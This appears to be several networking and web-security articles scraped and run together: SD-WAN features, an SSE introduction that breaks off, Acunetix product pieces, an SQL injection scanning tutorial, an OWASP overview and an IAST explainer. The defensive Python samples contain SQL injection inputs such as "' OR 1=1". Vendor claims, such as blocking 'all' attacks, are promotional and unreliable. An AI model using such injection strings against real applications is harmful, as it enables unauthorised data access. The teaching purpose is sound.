In addition to the two primary SD-WAN architectures, service providers offer managed SD-WAN services. As with any managed IT service, managed SD-WAN services repackage a vendor’s SD-WAN technology (typically an SD-WAN edge appliance, but not necessarily) with the service provider’s implementation expertise.

With managed SD-WAN services, organizations rely on the service provider to maintain and run the SD-WAN. As such, there are several service-specific features to consider including:

Service Level Agreements (SLAs) - SLAs should govern all aspects of the service, include a detailed service description, and specify the time needed to make any moves, adds, or changes (MACs) to the SD-WAN. Penalties should be specified as well.

Service and Support - A detailed description of support levels should be provided including escalation procedures and any agreements around time to repair.

Delivery Timeline - A clear project and delivery timeline should be specified with the SD-WAN roll out.

SD-WAN Must-Have Features

There are many features to consider when selecting an SD-WAN edge appliance or cloud-based SD-WAN architecture. The following are the minimum criteria for an SD-WAN:

Endpoints — The SD-WAN solution must connect locations to the SD-WAN with a hardware appliance or software, such as a virtual appliance or a VNF. The SD-WAN solution should also connect other types of resources, namely cloud datacenters (IaaS), cloud applications (SaaS), and mobile users.

Encrypted overlay — The SD-WAN must establish a secure, virtual overlay across network services. All traffic across that overlay must be encrypted, and the overlay must be policy-driven.

Data service independence — The SD-WAN must connect locations over the major types of Internet data services, such as fiber, xDSL, cable, and 4G/LTE, as well as MPLS for hybrid deployments.

Application policies — The SD-WAN must provide configurable policies describing application characteristics, such as failover options and the minimum and maximum thresholds for latency, loss, and jitter.

Real-time line monitoring — The SD-WAN appliances must be able to gather real-time latency and packet loss statistics for the attached lines.

Policy-based routing — The SD-WAN must implement algorithms that can select the optimum route for a given application based on configured application policies and real-time line statistics.
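
As a rough illustration of how such policy-based path selection can work, the following Python sketch (a simplified, hypothetical example, not any vendor's implementation) scores each available line against an application's configured latency, loss and jitter thresholds and steers traffic to a compliant path, falling back to the best-available line if none comply:

from dataclasses import dataclass

@dataclass
class AppPolicy:
    # Hypothetical application policy: maximum tolerated thresholds
    name: str
    max_latency_ms: float
    max_loss_pct: float
    max_jitter_ms: float

@dataclass
class LineStats:
    # Real-time measurements gathered per attached line
    line: str
    latency_ms: float
    loss_pct: float
    jitter_ms: float

def select_path(policy, lines):
    """Pick a line that meets the policy; fall back to the lowest-latency line."""
    compliant = [l for l in lines
                 if l.latency_ms <= policy.max_latency_ms
                 and l.loss_pct <= policy.max_loss_pct
                 and l.jitter_ms <= policy.max_jitter_ms]
    candidates = compliant or lines   # failover: best effort if nothing complies
    return min(candidates, key=lambda l: (l.latency_ms, l.loss_pct)).line

# Example: voice traffic is steered to the line that satisfies its thresholds
voice = AppPolicy("voice", max_latency_ms=150, max_loss_pct=1.0, max_jitter_ms=30)
lines = [LineStats("mpls", 40, 0.1, 5), LineStats("cable", 25, 2.5, 40)]
print(select_path(voice, lines))   # -> "mpls" (cable exceeds the loss and jitter thresholds)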

Recommended SD-WAN Security & VPN Features

While it’s not a definitional requirement, the SD-WAN solution should include advanced security services. All SD-WAN providers claim to deliver a “secure SD-WAN” but that only refers to traffic protection. Organizations still need to protect against data exfiltration, malware infection, and other advanced security threats, which requires advanced security technologies such as Next-Generation Firewall (NGFW), Secure Web Gateway (SWG), and advanced threat protection.

 internet attacks to wan infrastructure

Companies are forced to deal with internet & malware attacks to their infrastructure

Ideally, the SD-WAN will be converged with the advanced security services. With security and networking converged together, deployment becomes much simpler, capital costs drop, and operationally, the SD-WAN and security infrastructure are easier to maintain than with separate security and networking devices. But if converged security is not possible, at the very least the SD-WAN provider should offer service chaining/insertion to integrate with external third-party security services.

 sd-wan provider blocks internet attacks

SD-WAN providers block all malicious traffic/attacks at the Cloud level

With service chaining, deployment costs will be higher and operations more complex than with a converged SD-WAN, but advanced security at the branch is still necessary. Much of the performance and cost benefits of an SD-WAN come from replacing MPLS access with direct Internet access at the branch office. By exiting Internet traffic locally, the SD-WAN avoids the backhaul and performance problems of traditional WAN configurations. Without advanced security at the branch office, however, users cannot take advantage of local Internet access while remaining protected from the range of Internet-borne threats.

Specific advanced security features to consider from an SD-WAN provider include:

Next-Generation Firewall (NGFW)

The NGFW should offer:

  • High performance and elasticity — Inspect all application traffic, regardless of volume or use of encryption, without forced capacity upgrades.
  • Application awareness — Identify access to on-premise or cloud applications regardless of the port or protocol being used, or if the application is SSL encrypted.
  • User awareness — Identify users, groups, and locations regardless of IP address.
  • Unified, granular security policy — Control access to applications, servers and network resources.

Secure Web Gateway (SWG)

The SWG should offer:

  • Dynamic site classification — The SWG capabilities should include a URL database with many site category classifications, including phishing, malware delivery, botnets and other malicious sites.
  • Block, prompt or track user access — Reduce legal or security exposure from risky web usage.
  • Web access policy enforcement — Restrict website access in accordance with corporate policy.

Advanced Threat Prevention

The advanced threat protection capabilities should include:

  • Anti-malware — Scan HTTP and HTTPS traffic for malicious files and stop endpoint infections.
  • IPS / IDS — Apply context-aware protection to traffic based on domain / IP reputation, geolocation, known vulnerabilities, DNS, as well as application- and user-awareness.

SD-WAN offers three options for delivering advanced security functions at the branch - local security appliances, virtual network function, or firewall as a service (FWaaS):

Local Security Appliances

Local security appliances, such as firewall or UTM appliances, are the typical way companies protect branches. Appliances are notorious for introducing operational complexity and increasing costs. There’s significant overhead incurred from configuring, patching and maintaining security appliances at each location. And, as mentioned above, using advanced security functions (or continuing to operate effectively when traffic levels spike) requires significant hardware resources from the appliance. Often security professionals end up choosing between disabling advanced features, compromising organizational security, or being forced into a hardware upgrade.

Virtual Network Function (VNF)

A VNF is a virtual network security stack deployed onto a physical SD-WAN appliance or a third-party appliance called a vCPE. As such, VNFs reduce the physical challenges of running separate physical boxes at the branch office — HVAC, power budgeting, and the rest of the wiring-closet issues. However, VNFs are still discrete entities, requiring management of their software and upgrades, and facing the same scaling issues as any local security appliance.

Firewall as a Service (FWaaS)

Firewall as a Service (FWaaS) faces none of the scaling and maintenance challenges of local security appliances or VNFs. The infrastructure is built from the ground up as a cloud service, eliminating the management challenges and scaling issues of security appliances. FWaaS does, however, require the service provider to offer a fully multitenant, easy-to-use, and powerful security engine that can be run fully by the customer.

Recommended SD-WAN Mobility Features

The SD-WAN was classically seen as a replacement for the WAN and, as such, did not focus on connecting mobile users. But with data and applications shifting to the cloud, any SD-WAN should connect mobile and stationary users to those resources.

To do so, the SD-WAN should equip mobile users with client software for securely connecting into the SD-WAN. Once connected to the SD-WAN, the mobile user should be supported with the same optimized routing, security policies and management controls as users located within the office. Specific features should include:

Automatic optimum path selection — The SD-WAN mobile client should dynamically select the optimum path to the closest SD-WAN node (closest PoP).

Access control — Once connected to the SD-WAN, fine-grained access controls should restrict mobile user access by application, active directory groups or specific user identity. Organizations should be able to determine the precise resources that can be seen and accessed by the mobile user.

Advanced security — Mobile users should be fully protected by any advanced security services provided by the SD-WAN, such as NGFW, IPS, and SWG.

Recommended SD-WAN Management Features

The management and administration console is the view into the SD-WAN. As such, usability and design are obviously critical.

In the example below, the CATO Networks SD-WAN management console provides an intuitive interface from which we can monitor, configure policies and manage the entire WAN without worrying about service providers, VPNs or network equipment!

 sd-wan management console

Managing a global, 27-location SD-WAN network via CATO Networks

 

Other features to investigate for a future SD-WAN include:

SD-WAN configuration — The SD-WAN should allow for rapid site addition/removal; LDAP integration for quick addition of existing users into the SD-WAN; brief, well-documented integration process or automatic tools for cloud resource integration.

Converged configuration and reporting — Networking and security (if offered) should be tightly integrated together. A single, centralized view of all network and security events should be provided. Access-control definitions, security policies, networking policy configuration — all should be converged together. Reporting should be per site, VPN, and application.

Complete real-time visibility — The management console should provide complete, real-time visibility into the core functioning of the SD-WAN, including the topology, connected devices, network usage statistics, as well as advanced security services.

Detailed usage metrics — Visibility into network usage should be granular, allowing IT professionals to drill down into usage by VPN, location, device, user, and application. Monitoring and alerting should be provided on all networking and security events, with a full audit trail of all changes to system configuration and policies.

Application policy definition — The SD-WAN should allow for the creation of application policies including the specifying of the application’s importance (priority) and any relevant failover parameters.

Analytics engine and integration — An analytics engine should be provided by the product or easily integrated into the product.

Management protocols and APIs — The SD-WAN vendor should specify all northbound APIs for event correlation and user applications, and the management protocols (e.g., SNMP, HTTP, XML) available for in-house integration.

Summary

This article explained what SD-WANs are and how enterprises and organizations of every size are moving towards these WAN solutions. We analyzed the problems with traditional WANs, saw the benefits of SD-WANs, SD-WAN architecture design and implementations, talked about SD-WAN deployment methods and touched heavily on SD-WAN Security, VPN, Advanced Threat Prevention, Firewall services, Mobility and Management offered by leading SD-WAN providers.


Security Service Edge (SSE) Limitations & Disadvantages. Protecting all Traffic, Users, Apps, and Services with 360-degree SSE

This article explores the Security Service Edge (SSE) portion of Secure Access Service Edge (SASE) and the need for holistic cybersecurity protections.

We lightly touch upon the drivers for tighter enterprise security and then dive into what SSE is, comparing its architecture and migration path to SASE with a 360-degree SSE approach that offers complete visibility, optimization and control, along with a seamless path to SASE convergence.

How Security Service Edge (SSE) fits into SASE’s Security Pillars



The Need For Holistic Security

Legacy security architectures treated security as local and siloed, with appliances everywhere. Unfortunately, these architectures produced protection, performance, and visibility gaps, and the overall security requirements of enterprises have proven this model insufficient.

This outdated approach created the need for security simplification, and it is now expected that enterprises will replace these architectures with a strategy that will:

  • Simplify security management
  • Minimize security blind spots
  • Inspect traffic flows in all directions
  • Deliver Zero Trust access everywhere
  • Give visibility and control into all traffic

SSE vs. 360-degree SSE: What is The Architecture Difference?

Security Service Edge (SSE) is a new category introduced by Gartner, two years after SASE, and represents an essential step toward simplifying complex security architectures by consolidating them into cloud-delivered services. This allows enterprises to quickly adapt to new business and technical challenges like cloud migration, the growing hybrid workforce, etc.

The figure below represents the basic SSE architecture and its protection scheme:

basic sse architecture and protection scheme

Basic SSE Architecture and its protection scheme



Acunetix v13 Release Introduces Groundbreaking Innovations

The newest release of the Acunetix Web Vulnerability Scanner further improves performance and premieres best-of-breed technologies.

Acunetix, the pioneer in automated web application security software, has announced the release of Acunetix Version 13. The new release comes with an improved user interface and introduces innovations such as the SmartScan engine, malware detection functionality, comprehensive network scanning, proof-of-exploit, incremental scanning, and more. This release further strengthens the leading position of Acunetix on the web security market.

“Acunetix has always focused on performance and accuracy and the newest release is yet another proof of this,” said Nicolas Sciberras, CTO. “You cannot find these unique features in any other product.”

Unparalleled Performance

Scanning complex web applications using traditional web vulnerability scanners may take hours, having a serious impact on production site performance and internal processes. Acunetix addresses this problem by introducing even more innovations that improve scanning performance.

acunetix v13 web application and network vulnerability scanner interface

The SmartScan engine included with Acunetix v13 prioritizes unique pages to discover more vulnerabilities early on. In most cases, Acunetix SmartScan can find approximately 80 percent of vulnerabilities in the first 20 percent of the scan. The newest Acunetix engine also reduces the number of requests required to find vulnerabilities, which lessens the site load during the scan.

In addition to the SmartScan engine, the newest Acunetix release also introduces incremental scanning. You can choose to scan only the elements of your web application that have changed since the last full scan. On average, it shortens the process by 90 percent or more.

Comprehensive Security Coverage

With the release of Acunetix v13, network scanning functionality is now available on all platforms. Web vulnerabilities and network vulnerabilities are part of the same assessment and management processes.

In addition to the previously available malicious link discovery function, the newest Acunetix release also introduces web malware scanning. Acunetix discovers scripts on websites and web applications, downloads them, and scans them locally using Windows Defender on Windows or ClamAV on Linux.

Further Advances In Automation

Acunetix v13 introduces two new features that greatly improve automation, especially in the case of larger organizations. The vulnerability confidence level clearly indicates whether the vulnerability may need further manual confirmation. Critical vulnerabilities typically have a 100 percent confidence level, which means that they are fully verified. For most such vulnerabilities, Acunetix now also provides a proof-of-exploit, such as the content of a sensitive file downloaded from the server.

The newest release also enhances the import and integration capabilities of Acunetix. The scanner can now additionally import WADL, ASP.Net WebForms, and Postman files to seed the crawl. You can also export vulnerabilities to even more issue trackers: GitLab, Bugzilla, and Mantis.

Technology Improvements

With all the new advances comes an improved user interface, featuring better sorting and filtering as well as response highlighting and improved accessibility.

In addition to the above innovations and improvements, the Java AcuSensor technology now supports the Spring framework, while the DeepScan crawling engine can now directly recognize Angular 2, Vue, and React frameworks and adjust crawling to their requirements.

Acunetix, The Company

Founded in 2005 to combat the alarming rise in web application attacks, Acunetix is a pioneer and market leader in automated web application security technology. Acunetix products are trusted globally by individual security experts, SMBs, and large organizations. It is the security provider of choice for many customers in the government, military, educational, telecommunications, banking, finance, and e-commerce sectors, including the Pentagon and Fortune 500 companies such as Nike, Disney, and Adobe.


How to Test for SQL Injection Attacks & Vulnerabilities

SQL injection vulnerabilities have held the first spot on the OWASP Top 10 list for quite some time. This is due to the fact that they are both still widespread and can lead to very serious consequences. Many major security breaches were caused by SQL injections, even in recent months. For example, this type of vulnerability caused a leak of financial data for more than 70 percent of citizens of Bulgaria.

However, SQL vulnerabilities are also easy to discover automatically using web vulnerability scanners. Advanced web security scanning software can detect even the more advanced type of SQL injections such as blind SQL injections. SQL injections are also easy to fix and avoid. Developers can use parameterized queries (prepared statements) or stored procedures to avoid the root cause of SQL injections, which is the direct use of untrusted user input in SQL queries.
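
As a quick illustration of the parameterized-query fix mentioned above, the short Python sketch below (using Python's built-in sqlite3 module purely as an example database; it is not part of Acunetix) passes user input as bound parameters instead of concatenating it into the SQL string:

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'foo', 'bar')")

def find_user(username, password):
    # The ? placeholders make the driver treat the values purely as data,
    # so input such as "' OR 1=1" cannot change the query's structure.
    return conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()

print(find_user("foo", "bar"))       # (1,)
print(find_user("foo", "' OR 1=1"))  # None - the injection attempt fails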

In this article, we will show you how to scan your web applications for SQL injections using the latest version of Acunetix. The scan will be performed on the VulnWeb site by Acunetix, which is intentionally vulnerable to attacks. The article assumes that you have downloaded and installed the Acunetix demo.


STEP 1: CREATING A SCAN TARGET

To begin testing your web application for SQL injections, you need to add your web application URL as the target.

  1.  Click on the Targets icon in the menu on the left. The Targets pane is displayed.

Creating a new target to scan for SQL Injection Vulnerabilities

  2. Click on the Add Target button. The Add Target dialog is displayed. In the Address field, enter the full URL of your web application. Optionally, in the Description field, enter a human-readable description of your target:

Adding a new target url to scan for sql vulnerabilities

  3. Click on the Add Target button in the Add Target dialog. The Target Info pane is displayed:

tweaking sql vulnerability scanning speed and settings

  4. In the Target Info pane, you can configure additional properties of the target. For example, you may choose to use AcuSensor technology, which requires that you install the AcuSensor agent on your web server. We recommend that you use this technology to increase the precision of your scanning.

STEP 2: PERFORMING A SCAN

Once your target is added and configured, you can scan it whenever you need to. You can also schedule your scans for the future. There are different types of scans, depending on your current needs. In this article, we will perform an SQL injection scan.

  1.  Click on the Scan button in the Target Info pane. You can also click on the Scans icon in the left-hand menu to open the Scans pane, select the target by clicking on the leftmost column, and click on the New Scan button. The scan is started. You can see the progress of the scan in the Activity section:

scanning for sql injection vulnerabilities

  2. When the scan is finished, a Completed icon will be visible in the Activity section:

sql injection vulnerability scan complete

STEP 3: INTERPRETING RESULTS

When the scan is completed, you can analyze the details of the discovered vulnerabilities so that you know how to eliminate them. Acunetix provides additional information about all vulnerabilities as well as helpful links that teach you how to fix the issue.

  1. To see the details of vulnerabilities discovered during the scan, click on the Vulnerabilities tab. You can also click on the Vulnerabilities icon in the left-hand menu to see vulnerabilities for all targets at the same time:

list of sql injection vulnerabilities detected

  2. To see the details of a selected vulnerability, click on the row in the table that represents the vulnerability. The vulnerability details panel is displayed:

examining sql injection vulnerabilities detected

As you can see above, Acunetix provides exact details of the payload and the resulting SQL query. Since AcuSensor technology was used, the report also shows the source file and the line of code causing the SQL Injection vulnerability.

Summary

This article showed how to detect SQL Injection vulnerabilities on your website, web application or CMS system. We saw how easily and quickly the Acunetix Web Vulnerability Scanner can be used to scan for, and obtain a full report of, all SQL Injection vulnerabilities and exploits your systems are susceptible to.


What is OWASP? Open Web Application Security Project - Helping Developers and Businesses Raise Awareness on Cyber-Security Attacks, Vulnerabilities and Security Threats

With nearly every business sector relying on the internet and digital tools to function, it is no surprise that cybersecurity is the second-fastest growing industry. Hackers don’t care how large or small your company is. They will target all sizes in an all-out effort to steal data, access confidential or classified information, cause mayhem, and hurt the organization's reputation.

Fortunately, not all hackers have nefarious intentions. The open source community is full of experts who are looking to warn people about threats and find the most effective ways to keep data safe. Many of those experts are a part of the Open Web Application Security Project (OWASP).

In this article, we'll cover the basics of OWASP and the critical role this work plays in the everyday operation of computers, servers, and other forms of modern technology.

What Is OWASP? Introduction To Open Web Application Security Project

OWASP was originally founded in 2001 by Mark Curphey and is run as a not-for-profit organization in the United States. The bulk of its contributors are pulled from the open-source community. Today, more than 32,000 people volunteer as part of OWASP's efforts, with much of their communication coming through message boards or email distribution lists.

The organization is designed to be an unbiased group focused on the best interests of the technology world as a whole. They will not promote specific vendor products or solutions. Instead, OWASP aims to provide practical information to organizations all across the world, with the goal of offering helpful security advice to bring about more informed decisions.

Where OWASP becomes particularly valuable is to small and medium-sized businesses that may not have a large IT budget and may lack expertise when it comes to cybersecurity. Thanks to the documentation that OWASP creates, these types of organizations can gain a better understanding of where their systems are vulnerable and how to protect themselves better.

If you’ve heard of OWASP, it’s likely been in conjunction with a report they update every few years known as the OWASP Top 10. The list covers the most relevant cybersecurity threats facing the global community. Later in this article, we'll dive into some of the specifics referenced in the Top 10.

Importance of Vendor Neutrality (OWASP)

The OWASP community is firm about never endorsing specific products or services related to cybersecurity. This might seem counterintuitive. A company needs to make investments in certain tools if they hope to protect their digital assets. And knowing what vendors to trust is important.

However, the purpose of OWASP is to draw attention to the largest security threats we are facing today. If they were to accept advertising or payments for endorsements, then they would lose their impartial status and reliability. You would not know whether they were recommending a security tool because it was actually the best or because someone was paying them to say so.

In a perfect world, all security vendors would produce products and services that function as intended, whether they are developing virus scanners, malware detectors, or software firewalls. But the dirty underbelly of the industry is inhabited by the cybercriminals who try to disguise their attacks within security tools that are designed to look legitimate.

There is no perfect vulnerability security tool or solution, which is why OWASP avoids picking certain products to recommend. The members of OWASP want to highlight security risks to inspire organizations to go out and find a solution that works best for them.

Members of OWASP follow a strict set of rules when it comes to dealing with vendors. They are not allowed to accept sales pitches or participate in a technology talk sponsored by a brand. No materials should be distributed in OWASP mailing lists that focus on particular vendors or products.

Why Web Application Security Matters

Organizations with unimpressive IT budgets may be tempted to minimize how much they spend on security-related tools, activities, and training because of the challenge of mathematically determining what the return on investment (ROI) will be. If one thing is certain, it’s that management will want to know the ROI, and when cyber-attacks are in play, coming up with an accurate representation of how much a successful penetration could have cost is, well, not easy.

But lowering the priority of cybersecurity protection is dangerous. Instead, you need to treat it like you would car insurance or health insurance. Everyone likes to think that they won't get into a car accident or have to go to the hospital, but insurance is there to cover you for unexpected incidents.

With IT security tools, you typically purchase a solution entirely or else pay for a subscription on a monthly basis. In either case, you spend money up front to avoid disaster for your entire organization. The point is to protect yourself from attacks before you even know you are being targeted.

Cybercriminals obsessively spend their lives looking for system vulnerabilities that can expose data or bring down entire servers. Usually, money is the primary objective, with the attackers seeking to sell stolen data on the dark web for profit. In some cases though, the attack is meant purely to destroy a company's reputation or ability to operate.

The goal of OWASP is to track the most common tactics that hackers utilize and identify what sort of protection is required to defend against them. New vulnerabilities are discovered every day, so that's why it's critical to maintain cybersecurity as an active part of your organization's operations. Buying a set of security tools is not enough. You need to keep those up to date and watch for new types of attacks that demand new types of solutions.

The OWASP Top 10 List

owasp top 10

OWASP Top 10 List

As mentioned before, OWASP is best known for the Top 10 List of security vulnerabilities that they revise and publish regularly. The latest version is from 2017 and remains applicable today. The Top 10 List documentation includes an explanation of each risk as well as diagrams and prevention tips.

SQL Injection Attacks

Many of the threats on the Top 10 List are targeted at software developers who write code and may discover these types of security flaws during the course of their work. For example, the first risk listed concerns database injections for SQL and other platforms. Hackers have used injection vulnerabilities for years to manipulate front-end inputs like search fields to retrieve or edit data that should be inaccessible to them.

Cross-Site Scripting Attacks

Another major code-based risk is cross-site scripting (XSS) attacks, where a cybercriminal will find a way to execute JavaScript or HTML on a remote webpage. Often, they will redirect users to a rogue URL where they try to steal personal information or financial data.

Best of the Rest

Some of the other items on the Top 10 List exist at a lower level of coding. For example, there are software libraries and frameworks that have known vulnerabilities that hackers can exploit. If your organization uses software that requires such an asset, then you should consider it to be at risk until it is patched.

But even if your coding standards are strict and secure, there are still risks that exist at a system or network level. Sensitive data exposure is included in OWASP's Top 10 List, as major data breaches have become a regular occurrence among businesses of all sizes and within all industries.

Accessing Digital Resources Securely

Obviously, OWASP is a huge fan of impressing upon organizations the critical need for internal and external users to only access digital resources securely. There are a variety of ways to accomplish this, including but not limited to:

  1. Forget the old advice that an eight character password is good enough. Modern password managers allow you to create incomprehensibly complex codes that run to 12 or 16 characters or longer.
  2. Think before you click. As social engineering scams have moved online, every member of your company needs to be educated to be suspicious of every link because a nasty bit of malware could be hiding on the other end.
  3. Use a virtual private network (VPN) in conjunction with your regular ISP. The cost is modest and it allows you to apply military-grade encryption to your data flow every time you go online. Another VPN benefit is that you receive a new anonymous IP address that makes it difficult for a bad guy to determine exactly where you are.
  4. Back up - as in backup your network regularly. There’s a decent chance a hacker will eventually be successful. At that point, your best defense is to be able to roll back the network to a previous point in history before the malware got in.
  5. Multi-Factor Authentication (MFA). MFA is quickly becoming an industry standard, requiring users to verify their identity using additional means beyond their password. Usually, the second authentication is a One-Time-Password (OTP) or a push notification verification via an application installed on the user’s phone (see the short OTP sketch after this list).
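
As a minimal sketch of how the OTP step in item 5 typically works, the following Python example uses the pyotp library (an assumed third-party dependency, installed with pip install pyotp) to generate and verify a time-based one-time password against a shared secret:

import pyotp

# The shared secret is provisioned once, e.g. via a QR code scanned into an
# authenticator app (the value below is generated just for illustration).
secret = pyotp.random_base32()
totp = pyotp.TOTP(secret)

print("Current one-time password:", totp.now())

# Server-side check of the code the user typed in (here we reuse totp.now()
# as a stand-in for the user's input):
user_code = totp.now()
print("Accepted:", totp.verify(user_code))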

There are hundreds of other preventative measures to take to keep your system safe, but these five will get you a long way down the road while you get up to speed on all the security education OWASP has to offer.

Summary

Before you jump to purchasing costly solutions from vendors to cover each scenario on the OWASP Top 10 list, remember that a huge part of cybersecurity is awareness and education. Members of your organization should attend training on a regular basis to understand what risks exist for them both as users and system owners.

Following the lead of the OWASP community can help your company maintain a strong reputation. If your cybersecurity efforts are working properly, they should be invisible to people inside and outside of your organization. Problems begin when a hacker manages to compromise your systems, leaving your digital assets and customers at risk.


Precision Web Application Vulnerability Scanning with Interactive Application Security Testing (IAST)

There are two primary approaches to web application security testing. Dynamic Application Security Testing (DAST), also called black box testing, imitates an attacker.

The application is tested from the outside with no access to the source code or the web server. Static Application Security Testing (SAST), also called white box testing, imitates a code reviewer. The application source code is analyzed from the inside.

Before we dive deeper into these web application testing and vulnerability scanning technologies, let's look at the strengths of each approach.

Analyzing Dynamic Security & Static Application Security Testing

Both of these methods have lots of advantages. The DAST approach is very practical and has huge coverage. You can run a black box test on an application written even in the most exotic technology or language. Its coverage is even broader because detected vulnerabilities can be caused, for example, by bad configuration rather than by mistakes in the source code.

On the other hand, SAST can let you discover some things that are not obvious when seen from the outside. For example, additional URLs or parameters. With white box testing, you also know immediately where the problem is located in the source code so it speeds up fixing.

interactive application security testing

IAST provides precision web vulnerability scanning

Imagine how effective a security scan can be if you were to join the two methods together! And no, this is not just theory, it actually exists. The merger of these two approaches is called Interactive Application Security Testing (IAST) or gray box testing and is available for example in Acunetix (thanks to its AcuSensor technology).

What Can You Do with IAST?

A gray box testing solution adds hooks around key calls (for example, database calls, system calls, etc.). Those hooks, often called sensors, communicate two ways with the IAST scanner. Hooks do not require access to the source code. The scanner works directly with the interpreter or the application server.

Sensors provide additional information about the calls. In addition, they can provide a full site map from the point of view of the web server. For example, a standalone DAST scanner would not be able to find a URL or a URL parameter that is not linked to or in some way announced by the application. However, with a full site map, the IAST scanner can attempt to test the unannounced URLs/parameters.

Some security flaws may also be caused by bad configuration. This is another activity in which an IAST scanner can excel. Sensors can help to find security errors in interpreter/compiler configuration files and provide the scanner with additional information to attempt attacks based on these configuration properties.

Last but not least, these two methods together can have a significant impact on the reduction of false positives! For example, when you run a time-based blind vulnerability test with a DAST scanner, the scanner may only guess that a time delay is caused by a vulnerability (for example, an SQL server processing a sleep command). When you have a sensor that is monitoring what is going on server-side, you can be one hundred percent sure what causes the time delay.
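
To make the idea of a sensor more concrete, here is a deliberately simplified Python sketch (a conceptual illustration only, not how AcuSensor is actually implemented) in which a thin wrapper hooks a database call and records every SQL statement that reaches the database, which is essentially the server-side visibility that removes the guesswork from a pure black box scan:

import sqlite3

class SensorConnection:
    """Minimal stand-in for an IAST sensor: wraps a DB connection and
    records every SQL statement it sees for the 'scanner' to inspect."""

    def __init__(self, connection):
        self._conn = connection
        self.captured_queries = []   # what a real sensor would report back

    def execute(self, sql, parameters=()):
        self.captured_queries.append(sql)          # hook: record the exact query
        return self._conn.execute(sql, parameters)

conn = SensorConnection(sqlite3.connect(":memory:"))
conn.execute("CREATE TABLE users (name TEXT)")
conn.execute("SELECT * FROM users WHERE name = 'foo' OR 1=1")

# The scanner side can now see exactly what reached the database:
print(conn.captured_queries)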

Web Application Vulnerability Scanning - Automation To The Rescue

Using a sensor requires no additional work from developers. The IAST scanner uses clever tricks to intercept calls. When it is working with an interpreter, it listens in on the communication between the interpreter and the web server. It analyzes this communication, finds all the potentially risky calls, and uses even more clever tricks to modify calls on the fly by adding hooks. When it is working with a bytecode compiler, it taps the communication with the application server.

IAST may make developer work even easier. If you use a DAST scanner and find a vulnerability, the developer always needs to go through the source code to identify the location of the security issue. But in some cases, a sensor may be able to pinpoint the root cause of the vulnerability and show you the line of code or give you a stack trace.

Where’s the Catch? Supporting PHP, Java and .NET

Gray box testing looks too good to be true. The only problem is its coverage. Just like SAST scanners, IAST works only with specific programming languages and environments. At the moment, AcuSensor supports PHP, Java, and .NET. However, taking into consideration that according to W3Techs surveys these three technologies together cover 94.4% of the landscape, this should not be much of a concern for most.


Free Web Application Vulnerability Report (2019) – Popular Web Attacks, Vulnerabilities, Analysis, Remediation

Acunetix has just released their annual Web Application Vulnerability Report, which aims to provide security professionals, web application developers, system administrators, web server administrators and other interested parties with an analysis of data on web application vulnerabilities detected over the past year via scans run on the Acunetix Online platform.

The extensive report has been compiled from scans performed on more than 10,000 targets and reveals some very interesting results about today's security threats and the percentage of organizations that correctly deal with their vulnerable web applications and exploits. It covers everything from SQL Injection and Cross-Site Scripting (XSS) vulnerabilities to popular CMS platform vulnerabilities, remediation steps and more.

Here are some of the report's highlights that will surely interest every IT security professional and web application developer:

  • 46% of websites scanned contained high severity vulnerabilities
  • 87% of websites contained medium severity vulnerabilities
  • SQL Injection vulnerabilities have declined slightly
  • 30% of websites contained Cross-Site-Scripting (XSS) vulnerabilities
  • 30% of websites had vulnerable JavaScript Libraries
  • 30% of websites were WordPress sites with a number of vulnerabilities

The report is a great opportunity for professionals to learn more about the latest and greatest vulnerabilities circling the web and proactively take measures to ensure their own websites and web applications are properly tested and patched against popular vulnerabilities and attacks.

Here’s vital security information the 2019 Web Application Vulnerability Report contains:

  • Vulnerabilities that are rising and falling in frequency
  • Vulnerability findings by type and severity
  • Changes in the threat landscape from both clients and server sides
  • The four major stages of vulnerability analysis
  • Detailed analysis of each discovered vulnerability – how it works, pointers and remediation steps
  • Current security concerns – increasing complexity of new applications, accelerating rate of new versions and the problem of scale
  • Vulnerabilities that are major to the security of all organizations, regardless of their size and location.
  • Plenty of useful information and advice aimed at network security professionals, web application developers, IT Managers, security auditors, application architects and more.

The 2019 Web Application Vulnerability Report is used by leading security professionals and web application developers to help them understand how to protect networks and applications from the latest security threats and web vulnerabilities.

2019 web application vulnerability report pages


Acunetix Enterprise: Find Website - Web Application Vulnerabilities & Security Flaws Before Hackers Do

Security researchers disagree about the percentage of vulnerable websites, but most concur that it’s way too high. Despite their long history, attackers continue to use cross-site scripting (XSS), SQL injection and more to successfully compromise sites and web applications. In today’s era of cloud-based and on-premises web applications that connect directly into the organization, it’s more important than ever to take a step back and consider the risk of web and security vulnerabilities that can leave your organization open to hackers.

As web applications scale, manual security assessments can become time-consuming and challenging to process while outsourcing these tasks won’t always provide the desired result. In many cases, a degree of automation is the way forward, and the decision becomes which web vulnerability scanner to choose.

Firewall.cx has written extensively about the pros of web vulnerability scanners, popular tools, and good common security practices. Despite this, we keep coming back to Acunetix, and it recently received a major upgrade. Version 12 of the enterprise-grade security tool is a significant leap forward that deserves an in-depth assessment.

Founded in 2005, Acunetix was designed to replicate hackers, yet catch vulnerabilities before they do. The leaps and bounds since its release have led to use in government, military, and banking, as well as partnership with Microsoft and AWS.

With that said, let's dive into our in-depth analysis.

Installing and Using Acunetix 12 Enterprise

When it comes to sheer usability, it’s easy to see why. While most readers will have no problems with complex setups, it’s always nice to avoid the hassle. Acunetix’s installation is a matter of creating an admin account, entering the license key, and choosing a port.

acunetix enterprise installation

All told, it took a matter of minutes to get up and running and didn’t require any additional configuration or restarts. For Enterprise customers, multi-engine deployment is also available, allowing for more simultaneous scans. As you’d expect, the setup is a little more complex, but still only requires a single line in command prompt and some additional registration inside Acunetix. Once configured, users can set targets to only scan with a specific engine and can push past the normal limit of 25 simultaneous scans.

However, many organizations will still want to set up user accounts for different roles. The software has three different account types for Tech Admins, Testers, and Auditors:

acunetix enterprise user groups

Adding additional users is possible via a tab in the settings menu, with an email and secure password with special characters required. After selecting a role, the admin can decide whether to give users access to all targets or add them to a specific target group at a later date.

acunetix enterprise creating accounts

Standard licenses are limited to one user, but Enterprise and Online plans can create an unlimited number, all with separate roles and targets. For additional security, admins can enable two-factor authentication, enforce password changes, and specify the number of login failures before lockout.

Scanning Web Applications and Websites with Acunetix 12 Enterprise

After installation, Acunetix’s web portal opens in the default browser. Users are taken to the dashboard, which reveals the number of open vulnerabilities discovered, websites scanned, and most common vulnerabilities.

acunetix enterprise main dashboard


